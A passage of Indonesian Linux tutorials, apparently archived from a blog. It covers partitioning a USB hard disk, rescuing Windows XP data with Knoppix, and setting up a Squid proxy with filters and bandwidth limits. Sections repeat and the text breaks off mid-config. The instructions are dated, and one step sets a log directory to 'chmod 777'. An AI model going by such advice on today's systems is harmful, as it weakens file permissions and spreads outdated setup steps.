- Baca doa ... mudah2an berhasil ...
- silahkan alirkan listrik ke badannya ... koq badan sih... maaf.. hidupkan power usb hdd external nya :D
- udah hidup? Atur nafas... nah... sekarang masukkan perlahan2 tapi pasti... ke lubang itu loh... (Awas... jangan piktor !! )
- sekarang periksa apakah sudah ke detect ato belom? (detik-detik penuh kecemasan)
-
root@iman# dmesg
usb 1-1: new full speed USB device using address 3
scsi1 : SCSI emulation for USB Mass Storage devices
Vendor: Maxtor 6 Model: Y080L0 Rev: 0 0
Type: Direct-Access ANSI SCSI revision: 02
SCSI device sda: 160086528 512-byte hdwr sectors (81964 MB)
sda: assuming drive cache: write through
/dev/scsi/host1/bus0/target0/lun0: p1 p2 p3 < p5 p6 >
Attached scsi disk sda at scsi1, channel 0, id 0, lun 0
Attached scsi generic sg0 at scsi1, channel 0, id 0, lun 0, type 0
USB Mass Storage device found at 3
- **fiiuuuhhh ...** (menghela nafas) ... ternyata kedetect... :-D
- sekarang posisi hdd external anda telah dikenal sebagai sda ^_^
4. Membagi partisi & format
- masuk ke fdisk /dev/sda, lalu bagi sesuai kebutuhan anda.
Disini aku bagi menjadi 4 partisi dimana 2 partisi dengan ext3 dan 2 lagi sebagai vfat.
-
root@iman# fdisk /dev/sda
Device Boot Start End Blocks Id System
/dev/sda1 1 2615 21004956 83 Linux
/dev/sda2 2616 5230 21004987+ 83 Linux
/dev/sda3 5231 9964 38025855 5 Extended
/dev/sda5 5231 7845 21004956 b W95 FAT32
/dev/sda6 7846 9964 17020836 b W95 FAT32
- Setelah partisi dibagi & diberi type nya ... silahkan keluar, huss... huss .. hus... :D
- Saatnya memformat partisi tersebut (perhatikan pada sda berapa partisi linux anda)
-
root@iman# mkfs.ext3 /dev/sda1
mke2fs 1.35 (28-Feb-2004)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
2627520 inodes, 5251246 blocks
262562 blocks (5.00%) reserved for the super user
First data block=0
161 block groups
32768 blocks per group, 32768 fragments per group
16320 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000
Writing inode tables: done
Creating journal (8192 blocks): done
Writing superblocks and filesystem accounting information: done
-
5. Mount partisi
- buat direktory tempat me-mount partisi dari hdd external anda, lalu mount partisi tersebut
-
root@iman# mkdir /mnt/sda1
root@iman# mkdir /mnt/sda2
root@iman# mount /dev/sda1 /mnt/sda1
root@iman# mount /dev/sda2 /mnt/sda2
- Anda mau partisi2 tersebut mount secara automount saat booting ataupun saat di colokin?
Gih Baca lagi artikelnya mas idban ... Ok.... :D
- Jangan terlalu banyak terguncang pada saat hdd hidup ya...!!!
- Salam dari Medan
6. Referensi
Flashdisk - Idban Secandri
Man fdisk
Man mount
Man lsmod
Man modprobe
Man mkfs.ext3
Man si Iman a_ir_hrp .... hehehehe :D
SELAMAT MENCOBA
Salam dari Medan City .....
-------------------------------------------------------------------------------------------
<<--I.R-Harahap-Medan -->>
Aku bukanlah orang yang merasa pandai :-(
Aku selalu menganggap diriku orang yg kekurangan :-(
Dgn kekurangan itulah aku mau belajar agar bisa pandai ^_^
-------------------------------------------------------------------------------------------
- a_ir_hrp
- 081-361-305-777
- Feb, 15 1981
- My site http://iman.medanlinux.com
- Aku Cuman Seorang Manusia biasa
Cara penggunaan device ini sangat mudah seperti menggunakan Flashdisk..... (Ref. Baca artikel mas Idban Secandri ttg Flashdisk )
Nb. 1. Diasumsikan bahwa hdd tsb masih perawan ... eeehhh.... salah.. maaf.. masih belum di bagi atau di format partisinya .. :D
2. Hdd yang digunakan adalah jenis Hdd PC biasa Maxtor 80 Gb 7200rpm.
3. Di ujicoba ditempat yang sangat menyedihkan dengan mesin Slackware 10 - kernel-2.6.8 :-(
Menyelamatkan data di Windows XP dengan linux Knoppix
Tidak terasa teknologi komputer semakin berkembang, sistem operasi juga semakin banyak mulai dari dos, windows 9x, windows NT, windows XP, OS2, MacOS, Unix, Linux. linux saat ini sangat banyak pengembangnya di site www.distrowatch.com tercatat lebih dari 100 distro, mulai dari distro seperti redhat, fedora, suse, mandrake, debian. perkembangan terakhir distro linux, saat ini mulai banyak dilirik media alternatif selain di install di hardisk PC, yaitu linux live CD dengan linux live cd kita bisa memakai linux tanpa harus menginstall nya. tinggal masukan ke cd-rom drive dan boot ke cd...dan anda telah memakai linux. pelopor linux live cd knoppix dibuat oleh Klaus Knopper dari jerman http://www.knoppix.net. mendapatkan linux knoppix juga sangat mudah download di www.knoppix.net, atau mirror nya di http://kambing.vlsm.org/debian-cd/knoppix/, atau beli di toko cd, beli infolinux.
Banyak di antara kita yang masih memakai windows untuk dirumah, dikantor, di warnet. terlepas dari windows tersebut bajakan atau bukan. Suatu saat windows bisa crash, currupt, tidak bisa di boot, kalau sudah begini baru pusing untuk menyelamat kan data. Untuk windows 95, windows98, windows ME. kita masih bisa memakai disket boot dos dan membaca isi drive nya karena masih memakai file system FAT yang masih bisa dibaca oleh dos. Sedangkan windows NT, 2000, XP kalau memakai file-system NTFS tidak akan bisa dibaca oleh disket dos. jadi menyelamatkan system atau data di file-system NTFS cukup sulit, apalagi jika windows tidak memberi kesempatan kita untuk masuk ke konsol atau pun ke desktop.
Salah satu cara yang mudah untuk memnyelamatkan data dengan menggunakan linux live-cd seperti cd knoppix. setelah kita bisa menjalankan knoppix kita bisa membackup data ke komputer file server, komputer orang lain sementara windows nya bisa kita utak-atik. berikut ini step by step untuk rescue windows XP dengan Linux Knoppix.
Buat komputer untuk bisa boot ke cd, caranya masuk ke bios pada saat boot tekan "del" pada notebook biasanya F2, cari boot squence biasanya di bagian advance (bios ami, award kecuali md intel). Buat first boot ke CD.
Pasang CD Knoppix di cdrom drive
Tunggu kira-kira 5 menit akan masuk ke desktop linux knoppix. kalau gagal, pada saat lilo (boot loader linux) ketik F2 akan masuk ke boot option. kalau vga card tidak mendukung atau memory kurang, coba masuk ke tesk mode dengan boot option "knoppix 2"
Setelah di desktop linux masuk ke menu Knoppix -> Network -> network configuration. kalau jaringan memakai dhcp tekan ok. kalau tidak tekan no, kemudian masukan IP address, DNS, Gateway (yang terpenting adalah IP address). Atau kalau tidak berhasil ke desktop, coba boot ke text mode, di console ketik "netcardconfig", kemudian masukan ipaddress, coba ping ke komputer teman, server.
Coba browse network komputer dengan perintah "smbclient -L nama-komputer", kalau meminta password tekan saja enter (kalau kita yakin komputer yang share tidak di password). Buat direktory mount untuk samba-share "mkdir /mnt/samba-share" Kemudian buka network share yang akan di jadikan backup dengan perintah "smbmount //nama-komputer/nama-share /mnt/samba-share" kalau di share tersebut di password tambahkan option "username=***" "passowrd=***".
Mount hardisk local dengan perintah "mount /mnt/hda1" (primary master, partisi pertama), "mount /mnt/hda5 (primary master, partisi logikal pertama).
Buka program mc (Midnight Commander) dengan perintah "mc" sangat mirip dengan Norton commander jaman dos dahulu kala, kemudian di sebelah kiri bisa dibuka /mnt/hda1, disebelah kanan /mnt/samba-share. select dengan "insert" dan copy "F5" file-file yang ingin di backup (hilangkan check "preserve Attributes" untuk tidak mengganti atribut file yang backup). Kalau ada ftp sever bisa gunakan "FTP link" misalnya kita mau back up ke ftp server "ftp.server.co.id" dengan user=gue password=passgue, di direktory pub/backup masuk ke menu Right -> FTP link kemudian keluar FTP to machine (tekan F1 untuk melihat contohnya) ketikan /#ftp:gue:passgue@ftp.server.co.id/pub/backup.
Setelah selesai membackup file kita bisa mengoprek windows XP nya. kalau prlu di format juga boleh, file-file penting kita telah selamat.
Catatan terakhir, bisa juga digunakan linux live-cd yang lain misalnya Mandrake-Move (tidak ada mc), Slax, Gnoppix, suse-livecd, dll, atau gunakan distro usb-flash seperti RUNT jika kita punya komputer yang bisa boot dari USB. Knoppix versi 3.1 3.2 mc nya suka error jika mengcopy banyak file. jadi gunakan versi 3.3, 3.4 atau yang terbaru 3.7.
Linux Knoppix membuka partisi NTFS dengan readonly, kalau FAT bisa read-write. linux dengan kernel 2.6 bisa membuka NTFS dengan read-write tetapi di live cd knoppix sepertinya belum bisa (saya tidak tahu pasti).
Kurniadi (kurniadi@patrakom.co.id)
Banyak di antara kita yang masih memakai windows untuk dirumah, dikantor, di warnet. terlepas dari windows tersebut bajakan atau bukan. Suatu saat windows bisa crash, currupt, tidak bisa di boot, kalau sudah begini baru pusing untuk menyelamat kan data. Untuk windows 95, windows98, windows ME. kita masih bisa memakai disket boot dos dan membaca isi drive nya karena masih memakai file system FAT yang masih bisa dibaca oleh dos. Sedangkan windows NT, 2000, XP kalau memakai file-system NTFS tidak akan bisa dibaca oleh disket dos. jadi menyelamatkan system atau data di file-system NTFS cukup sulit, apalagi jika windows tidak memberi kesempatan kita untuk masuk ke konsol atau pun ke desktop.
Salah satu cara yang mudah untuk memnyelamatkan data dengan menggunakan linux live-cd seperti cd knoppix. setelah kita bisa menjalankan knoppix kita bisa membackup data ke komputer file server, komputer orang lain sementara windows nya bisa kita utak-atik. berikut ini step by step untuk rescue windows XP dengan Linux Knoppix.
Buat komputer untuk bisa boot ke cd, caranya masuk ke bios pada saat boot tekan "del" pada notebook biasanya F2, cari boot squence biasanya di bagian advance (bios ami, award kecuali md intel). Buat first boot ke CD.
Pasang CD Knoppix di cdrom drive
Tunggu kira-kira 5 menit akan masuk ke desktop linux knoppix. kalau gagal, pada saat lilo (boot loader linux) ketik F2 akan masuk ke boot option. kalau vga card tidak mendukung atau memory kurang, coba masuk ke tesk mode dengan boot option "knoppix 2"
Setelah di desktop linux masuk ke menu Knoppix -> Network -> network configuration. kalau jaringan memakai dhcp tekan ok. kalau tidak tekan no, kemudian masukan IP address, DNS, Gateway (yang terpenting adalah IP address). Atau kalau tidak berhasil ke desktop, coba boot ke text mode, di console ketik "netcardconfig", kemudian masukan ipaddress, coba ping ke komputer teman, server.
Coba browse network komputer dengan perintah "smbclient -L nama-komputer", kalau meminta password tekan saja enter (kalau kita yakin komputer yang share tidak di password). Buat direktory mount untuk samba-share "mkdir /mnt/samba-share" Kemudian buka network share yang akan di jadikan backup dengan perintah "smbmount //nama-komputer/nama-share /mnt/samba-share" kalau di share tersebut di password tambahkan option "username=***" "passowrd=***".
Mount hardisk local dengan perintah "mount /mnt/hda1" (primary master, partisi pertama), "mount /mnt/hda5 (primary master, partisi logikal pertama).
Buka program mc (Midnight Commander) dengan perintah "mc" sangat mirip dengan Norton commander jaman dos dahulu kala, kemudian di sebelah kiri bisa dibuka /mnt/hda1, disebelah kanan /mnt/samba-share. select dengan "insert" dan copy "F5" file-file yang ingin di backup (hilangkan check "preserve Attributes" untuk tidak mengganti atribut file yang backup). Kalau ada ftp sever bisa gunakan "FTP link" misalnya kita mau back up ke ftp server "ftp.server.co.id" dengan user=gue password=passgue, di direktory pub/backup masuk ke menu Right -> FTP link kemudian keluar FTP to machine (tekan F1 untuk melihat contohnya) ketikan /#ftp:gue:passgue@ftp.server.co.id/pub/backup.
Setelah selesai membackup file kita bisa mengoprek windows XP nya. kalau prlu di format juga boleh, file-file penting kita telah selamat.
Catatan terakhir, bisa juga digunakan linux live-cd yang lain misalnya Mandrake-Move (tidak ada mc), Slax, Gnoppix, suse-livecd, dll, atau gunakan distro usb-flash seperti RUNT jika kita punya komputer yang bisa boot dari USB. Knoppix versi 3.1 3.2 mc nya suka error jika mengcopy banyak file. jadi gunakan versi 3.3, 3.4 atau yang terbaru 3.7.
Linux Knoppix membuka partisi NTFS dengan readonly, kalau FAT bisa read-write. linux dengan kernel 2.6 bisa membuka NTFS dengan read-write tetapi di live cd knoppix sepertinya belum bisa (saya tidak tahu pasti).
Kurniadi (kurniadi@patrakom.co.id)
Instalasi Squid, Banner Filter, Porn Filter, Limit Bandwith, Transparan Proxy
Sebelum menginstall alangkah baiknya siapkan satu pak rokok (A Mild) dan makanan ringan :) . Dokumen ini ditujukan untuk membantu membuat sebuah proxy server. Sistem Operasi yang digunakan adalah Redhat Linux 7.2. Semua paket tersebut menggunakan format source tarball. Tidak ada copyright apapun dalam dukumen ini, anda bebas menyalin, mencetak, maupun memodifikasi (dengan menyertakan nama penulis asli). Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas. Semoga bermanfaat dan memajukan opensource software di Indonesia.
Pastikan login pada server anda adalah sebagai root
1. Instalasi Banner Filter
Penempatan direktori Banner Filter harus didalam direktori www kita. misal saya di /usr/local/apache/htdocs .download souce Banner Filter di http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz
[root@PROXY hanny]# wget http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz
Ekstrak source bannerfilter-1.21.tar.gz :
[root@PROXY hanny]# tar -xzvf bannerfilter-1.21.tar.gz
Kemudian pindahkan hasil exstrak bannerfilter-1.21.tar.gz ke dalam /usr/local/apache/htdocs
[root@PROXY hanny]# mv bannerfilter-1.21 /usr/local/apache/htdocs/bannerfilter
[root@PROXY hanny]# cd /usr/local/apache/htdocs/bannerfilter
Edit file bannerfilter.conf
[root@PROXY bannerfilter]# mv bannerfilter.conf /etc
[root@PROXY bannerfilter]# vi /etc/bannerfilter.conf
Contoh isi bannerfilter.conf saya :
# Path to the directory containing the data files:
$DATA='/usr/local/apache/htdocs/bannerfilter';
# URL of the directory containing the HTML and graphics files
# (this must be accessible by the machine running Squid; it does
# not need to be accessible to the client machines):
$WWW='http://www.rsds.or.id/bannerfilter/www';
# Path to the banner log file if you want one, or leave empty (if
# specified, Squid must have write access to this file):
$LOG='';
# $LOG='/tmp/bannerlog.txt';
# If you prefer not to see "Blocked", use null.gif instead of
# banner.gif:
$BANNERGIF='banner.gif';
Penambahan script bannerfilter nantinya akan diletakan didalam squid.conf
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
2. Instalasi Squid
Sebelum installasi squid, pastikan daemon squid yang asli dari redhat harus anda stop atau musnahkan !!
caranya :
[root@PROXY hanny]# /etc/rc.d/init.d/squid stop
[root@PROXY hanny]# for a in `rpm -qa | grep squid`; do rpm -e --nodeps $a; done
Sekarang kita mendownload source squid. Saya menggunakan squid-2.5.STABLE2
Download source squid di http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz
[root@PROXY hanny]# wget http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz
Ekstrak source squid-2.5.STABLE2.tar.gz :
[root@PROXY hanny]# tar -xzvf squid-2.5.STABLE2.tar.gz
[root@PROXY hanny]# cd squid-2.5.STABLE2
Buat user untuk menjalankan squid, nama usernya adalah squid
Guna meningkatkan keamanan server kita, maka user squid tidak bisa digunakan untuk login
[root@PROXY squid-2.5.STABLE2]# useradd -d /usr/local/squid/ -r -s /dev/null squid > /dev/null 2>&1
Kompilasi dan install Squid :
[root@PROXY squid-2.5.STABLE2]# ./configure --prefix=/usr/local/squid --exec-prefix=/usr/local/squid > --enable-delay-pools --enable-cache-diggests --enable-poll > --disable-ident-lookups --enable-async-io=16 > --enable-auth-modules --enable-removal-policies --enable-snmp
[root@PROXY squid-2.5.STABLE2]# make all
Biasanya proses make all ini berlangsung lama, alangkah baiknya kita ambil sebatang rokok lalu di bakar :) betapa indahnya dunia ini !!
[root@PROXY squid-2.5.STABLE2]# make install
Sekarang kita masuk dalam tahap meng-edit konfigurasi ke dalam file squid.conf
[root@PROXY squid-2.5.STABLE2]# cd /usr/local/squid/etc
Anda bisa membaca terlebih dahulu http://www.squid-cache.org/Doc/FAQ/FAQ.html (Ambil sebatang rokok lagi agar ketegangan anda mereda !!)
Dalam meng-edit konfigurasi squid, anda bisa membaca readme yang sudah ada di dalam file squid.conf atau anda juga bisa melihat atau mengambil, file yang sudah saya edit http://www.rsds.or.id/linux/squid.conf.hanny
[root@PROXY etc]# wget http://www.rsds.or.id/linux/squid.conf.hanny
[root@PROXY etc]# vi squid.conf.hanny
kemudian carilah kata-kata dalam file squid.conf.hanny seperti keterangan dibawah ini yang berhurup bold italic :
ftp_user name@domain-anda.com
dns_nameservers IP-Address-DNS-ISP-Anda
acl user src 192.168.0.0/255.255.255.0
(ip192.168.0.0 adalah ranges ip address client kita mulai 192.168.0.0 sampai 192.168.0.255)
Didalam file squid.conf.hanny, sudah saya tambahkan script untuk menjalankan Banner Filter dan Porn Filter :
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
acl porn url_regex "/usr/local/squid/etc/porn.txt"
http_access deny porn
"Jika anda tidak menginginkan Banner Filter atau Porn Filter berjalan, maka pada awal script Banner Filter atau Porn Filter dalam file squid.conf.hanny harus di beri tanda " # " :
#redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
#acl porn url_regex "/usr/local/squid/etc/porn.txt"
#http_access deny porn
3. Limit Bandwith
Dalam file squid.conf.hanny, juga sudah saya tambahkan script untuk menggunakan delay pool :
#------------------------ DELAY POLL KONFIGURASI HANNY ---------------------------
#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwith
#We have two different delay_pools
delay_pools 2
#First delay pool
#W don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
delay_class 1 2
#-1/-1 mean that there are no limits
delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
delay_parameters 2 5000/150000 5000/120000
delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------
"Jika anda tidak menginginkan Limit Bandwith berjalan, maka pada awal script delay poll dalam file squid.conf.hanny harus diberi tanda " # "
#------------------------ DELAY POLL KONFIGURASI HANNY ---------------------------
#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
#acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwith
#We have two different delay_pools
#delay_pools 2
#First delay pool
#W don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
#delay_class 1 2
#-1/-1 mean that there are no limits
#delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
#delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
#delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
#delay_parameters 2 5000/150000 5000/120000
#delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------
Merubah nama file squid..conf yang asli dari komputer anda ke nama file lain. (sebagai back-up)
Dan merubah squid.conf.hanny menjadi squid.conf
[root@PROXY etc]# mv squid.conf squid.conf.punyaku
[root@PROXY etc]# mv squid.conf.hanny squid.conf
4. Instalasi Porn Filter
Buatlah terlebih dahulu file dengan nama porn.txt
[root@PROXY etc]# touch porn.txt
Isikan file porn.txt dengan site-site yang hendak anda tutup, misal www.17tahun.com
[root@PROXY etc]# vi porn.txt
isikan dengan kata 17tahun
Menjalankan squid
Memberi hak direktori squid dan bannerfilter agar proses berjalan lancar :
[root@PROXY etc]# chown -R squid.squid /usr/local/squid
[root@PROXY etc]# chown -R squid.squid /usr/local/apache/htdocs/bannerfilter
Aktifkan cache squid anda terlebih dahulu:
[root@PROXY etc]# /usr/local/squid/sbin/squid -z
Jika muncul permission denied pada saat pembuatan cache, cek dulu owner dan permission untuk directory cache :
[root@PROXY etc]# chmod 777 /usr/local/squid/var/logs/
Sampai tahap ini jika ada pesan error mohon email ke hanny@rsds.or.id
Jalankan daemon squid anda :
[root@PROXY etc]# /usr/local/squid/sbin/squid
Cek squid anda apakah jalan atau tidak :
[root@PROXY etc]# netstat -pln | grep squid
tcp 0 0 0.0.0.0 :8080 0.0.0.0:* LISTEN 777/(squid)
udp 0 0 0.0.0.0 :32771 0.0.0.0:* 777/(squid)
udp 0 0 0.0.0.0 :3130 0.0.0.0:* 777/(squid)
Jika keluar seperti hal diatas, maka squid anda telah berjalan !! rokokan dulu ah...: )
Test Squid Dari Komputer Client
Lakukan penge-test ping antar network anda, misal server anda mempunyai ip 192.168.0.1 dan ip windows client anda 192.168.1.2 :
[root@PROXY etc]# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) from 192.168.0.1 : 56(84) bytes of data.
Warning: time of day goes back, taking countermeasures.
64 bytes from 192.168.0.2: icmp_seq=0 ttl=255 time=233 usec
64 bytes from 192.168.0.2: icmp_seq=1 ttl=255 time=161 usec
Jika anda mempunyai client dengan operating system windows 98 atau windows me atau windows XP, pada software internet explorer coba isikan proxy dengan ip server anda dan port 8080 (misal ip server saya 192.168.0.1 maka pengisian proxy adalah 192.168.0.1 : 8080)
Coba anda buka situs-situs berikut ini dalam masing-masing new windows internet explorer :
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com
1. Bila situs http://www.yahoo.com terbuka maka artinya pengerjaan squid anda sampai tahap ini berjalan lancar.
2. Bila situs http://www.17tahun.com tidak terbuka dan hanya bertulisakan ACCESS DENIED maka Porn Firter anda berjalan lancar. Anda bisa menambahkan situs-situs yang ingin anda tutup, dengan meng-edit kembali file porn.txt
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt
3. Bila situs http://zdads.e-media.com tidak berbuka dan hanya bergambar BLOCKED AREA maka Banner Filter anda berjalan lancar.
5. Transparan Proxy
Agar lebih mudah kita akan menggunakan iptables
[root@PROXY hanny]# /sbin/iptables -F -t nat
[root@PROXY hanny]# /sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 > --dport 80 -j DNAT --to 192.168.0.1:8080
keterangan iptables diatas :
1. eth1 adalah interface lancard untuk ip gateway client.
2. 192.168.0.0/255.255.255.0 adalah ip client kita mulai dari 192.168.0.0 sampai 192.168.0.255.
3. --dport 80 -j DNAT --to 192.168.0.1:8080 adalah bila ada request port 80 (biasanya browsing), akan di paksa masuk ke squid dengan ip 192.168.0.1 port 8080.
Jika anda mempunyai client dengan operating system windows 98 atau windows me atau windows XP, pada software internet explorer, pastikan tidak terisi proxy. Dan pastikan pengisian ip client dan ip gateway client anda adalah benar adanya !!!
(Misal ip client saya mempunyai ip 192.168.0.2 dan ip gateway 192.168.0.1)
Coba anda buka situs-situs berikut ini dalam masing-masing new windows internet explorer :
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com
1. Bila situs http://www.yahoo.com terbuka maka artinya pengerjaan squid anda sampai tahap ini berjalan lancar.
2. Bila situs http://www.17tahun.com tidak terbuka dan hanya bertulisakan ACCESS DENIED maka Porn Firter anda berjalan lancar. Anda bisa menambahkan situs-situs yang ingin anda tutup, dengan meng-edit kembali file porn.txt
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt
3. Bila situs http://zdads.e-media.com tidak berbuka dan hanya bergambar BLOCKED AREA maka Banner Filter anda berjalan lancar.
Autorun Squid dan Transparan Proxy
Bila server squid kita restart dan kita tidak ingin mengulangi command2x seperti hal-hal pada artikel di atas, maka masukan script pada /etc/rc.local :
[root@PROXY hanny]# vi /etc/rc.local
isikan dengan :
#Menjalankan Transparan Proxy
/sbin/iptables -F -t nat
/sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 --dport 80 -j DNAT --to 192.168.0.1:8080
#Menghidupkan Squid
/bin/rm /usr/local/squid/var/logs/squid.pid
/usr/local/squid/sbin/squid
6. Lain-Lain
Bila kita inggin melihat siapa saja yang sedang mengunakan squid kita dan situs-situs apa saja yang mereka buka, anda bisa menggunakan:
[root@PROXY hanny]# tail -f /usr/local/squid/var/logs/access.log
Bila anda merubah isi file squid.conf dan ingin mencoba apakah squid.conf yang kita rubah bisa sesuai yang kita inginkan :
[root@PROXY hanny]# /usr/local/squid/sbin/squid -k reconfigure
7. ChangeLog
24 Maret 2003
Penambahan permission pada direktory cache (dani@bisnisweb.com)
24 Maret 2003
Penulisan tutorial ini dimulai (hanny@rsds.or.id)
8. Referensi
1. http://www.squid-cache.org/
2. http://www.tldp.org/HOWTO/mini/TransparentProxy.html
3. http://jateng.linux.or.id/index.html
4. http://netfilter.samba.org/
5. http://phroggy.com/bannerfilter/
9. Ucapan Terima Kasih
1. Kepada asfik , sunar , dani sebagai awal dari penginstallan squid saya.
2. Kepada channel #indolinux server dal.net dan efnet.net sebagai komunitas linux.
Pastikan login pada server anda adalah sebagai root
1. Instalasi Banner Filter
Penempatan direktori Banner Filter harus didalam direktori www kita. misal saya di /usr/local/apache/htdocs .download souce Banner Filter di http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz
[root@PROXY hanny]# wget http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz
Ekstrak source bannerfilter-1.21.tar.gz :
[root@PROXY hanny]# tar -xzvf bannerfilter-1.21.tar.gz
Kemudian pindahkan hasil exstrak bannerfilter-1.21.tar.gz ke dalam /usr/local/apache/htdocs
[root@PROXY hanny]# mv bannerfilter-1.21 /usr/local/apache/htdocs/bannerfilter
[root@PROXY hanny]# cd /usr/local/apache/htdocs/bannerfilter
Edit file bannerfilter.conf
[root@PROXY bannerfilter]# mv bannerfilter.conf /etc
[root@PROXY bannerfilter]# vi /etc/bannerfilter.conf
Contoh isi bannerfilter.conf saya :
# Path to the directory containing the data files:
$DATA='/usr/local/apache/htdocs/bannerfilter';
# URL of the directory containing the HTML and graphics files
# (this must be accessible by the machine running Squid; it does
# not need to be accessible to the client machines):
$WWW='http://www.rsds.or.id/bannerfilter/www';
# Path to the banner log file if you want one, or leave empty (if
# specified, Squid must have write access to this file):
$LOG='';
# $LOG='/tmp/bannerlog.txt';
# If you prefer not to see "Blocked", use null.gif instead of
# banner.gif:
$BANNERGIF='banner.gif';
Penambahan script bannerfilter nantinya akan diletakan didalam squid.conf
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
2. Instalasi Squid
Sebelum installasi squid, pastikan daemon squid yang asli dari redhat harus anda stop atau musnahkan !!
caranya :
[root@PROXY hanny]# /etc/rc.d/init.d/squid stop
[root@PROXY hanny]# for a in `rpm -qa | grep squid`; do rpm -e --nodeps $a; done
Sekarang kita mendownload source squid. Saya menggunakan squid-2.5.STABLE2
Download source squid di http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz
[root@PROXY hanny]# wget http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz
Ekstrak source squid-2.5.STABLE2.tar.gz :
[root@PROXY hanny]# tar -xzvf squid-2.5.STABLE2.tar.gz
[root@PROXY hanny]# cd squid-2.5.STABLE2
Buat user untuk menjalankan squid, nama usernya adalah squid
Guna meningkatkan keamanan server kita, maka user squid tidak bisa digunakan untuk login
[root@PROXY squid-2.5.STABLE2]# useradd -d /usr/local/squid/ -r -s /dev/null squid > /dev/null 2>&1
Kompilasi dan install Squid :
[root@PROXY squid-2.5.STABLE2]# ./configure --prefix=/usr/local/squid --exec-prefix=/usr/local/squid > --enable-delay-pools --enable-cache-diggests --enable-poll > --disable-ident-lookups --enable-async-io=16 > --enable-auth-modules --enable-removal-policies --enable-snmp
[root@PROXY squid-2.5.STABLE2]# make all
Biasanya proses make all ini berlangsung lama, alangkah baiknya kita ambil sebatang rokok lalu di bakar :) betapa indahnya dunia ini !!
[root@PROXY squid-2.5.STABLE2]# make install
Sekarang kita masuk dalam tahap meng-edit konfigurasi ke dalam file squid.conf
[root@PROXY squid-2.5.STABLE2]# cd /usr/local/squid/etc
Anda bisa membaca terlebih dahulu http://www.squid-cache.org/Doc/FAQ/FAQ.html (Ambil sebatang rokok lagi agar ketegangan anda mereda !!)
Dalam meng-edit konfigurasi squid, anda bisa membaca readme yang sudah ada di dalam file squid.conf atau anda juga bisa melihat atau mengambil, file yang sudah saya edit http://www.rsds.or.id/linux/squid.conf.hanny
[root@PROXY etc]# wget http://www.rsds.or.id/linux/squid.conf.hanny
[root@PROXY etc]# vi squid.conf.hanny
kemudian carilah kata-kata dalam file squid.conf.hanny seperti keterangan dibawah ini yang berhurup bold italic :
ftp_user name@domain-anda.com
dns_nameservers IP-Address-DNS-ISP-Anda
acl user src 192.168.0.0/255.255.255.0
(ip192.168.0.0 adalah ranges ip address client kita mulai 192.168.0.0 sampai 192.168.0.255)
Didalam file squid.conf.hanny, sudah saya tambahkan script untuk menjalankan Banner Filter dan Porn Filter :
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
acl porn url_regex "/usr/local/squid/etc/porn.txt"
http_access deny porn
"Jika anda tidak menginginkan Banner Filter atau Porn Filter berjalan, maka pada awal script Banner Filter atau Porn Filter dalam file squid.conf.hanny harus di beri tanda " # " :
#redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
#acl porn url_regex "/usr/local/squid/etc/porn.txt"
#http_access deny porn
3. Limit Bandwith
Dalam file squid.conf.hanny, juga sudah saya tambahkan script untuk menggunakan delay pool :
#------------------------ DELAY POLL KONFIGURASI HANNY ---------------------------
